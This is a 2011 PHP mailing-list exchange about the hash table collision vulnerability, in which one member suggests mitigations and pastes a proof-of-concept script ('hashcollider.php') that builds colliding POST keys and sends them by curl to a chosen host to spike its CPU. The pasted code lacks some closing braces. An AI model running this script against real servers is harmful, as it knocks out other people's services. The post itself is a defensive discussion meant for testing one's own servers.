[nycphp-talk] Hash Table Vulnerability in PHP5

Ben Sgro ben at
Thu Dec 29 11:33:20 EST 2011


Don't allow posts w/> ~100 k/v pairs. Don't allow larger uploads then is necessary. As you mentioned, I guess limit script execution time.
Right now, there's some snort signatures going around (Not sure if you run IDS, etc). I've also heard people mention a mod_rewrite regex
to strip out these bads chars.

I have a PoC here you can test against your servers: (And here also:

// v--- ripped from:                                     
// generate POST of Doom                                                                                                              
function doom() {
  // entries with collisions in PHP hashtable hash function                                                                           
  $a = array(
             '0' => 'Ez',
             '1' => 'FY',
             '2' => 'G8',
             '3' => 'H' . chr(23),
             '4' => 'D'.chr(122+33),
  // how long should the payload be                                                                                                   
  $length = 7;

  $size = count($a);

  $post = '';
  $max = pow($size,$length);
  for ($i = 0; $i < $max; $i++) {
    $s = str_pad(base_convert($i, 10, $size), $length, '0', STR_PAD_LEFT);
    $post .= '' . (urlencode(strtr($s, $a))) . '=&';

  return $post;

// hashcollider.php                                                                                                                   
// by sk                                                                                                                              

$post = doom();
$ch   = curl_init();
$args = getopt("h:");
$host = $args['h'];

curl_setopt($ch, CURLOPT_URL,            $host);
curl_setopt($ch, CURLOPT_POST,           1 );
curl_setopt($ch, CURLOPT_POSTFIELDS,     $post);

printf("[x] Target: %s\n", $host);
printf("[x] CPU spike!\n");
$result=curl_exec ($ch);
printf("[x] Payload sent.\n");

Good luck!

- Ben

On Dec 29, 2011, at 11:19 AM, Hans C. Kaspersetz wrote:

> Good morning,
> I hope everyone has seen the news about the Hash Table Vulnerability in lots of web scripting languages.  You can read about it here: or here
> It looks like PHP has addressed the issue (  by providing a max var directive in the latest RC5 for 5.4.0.  However, with all release candidates they are strongly advising against using it in production.
> What is the general consensus for mitigating this risk without moving to RC5?
> We are limiting the execution time of our scripts, however for upload scripts or processing intensive scripts we need to increase the execution time which I image would leave those scripts more vulnerable.
> Thanks,
> Hans Kaspersetz
> Cyber X Designs
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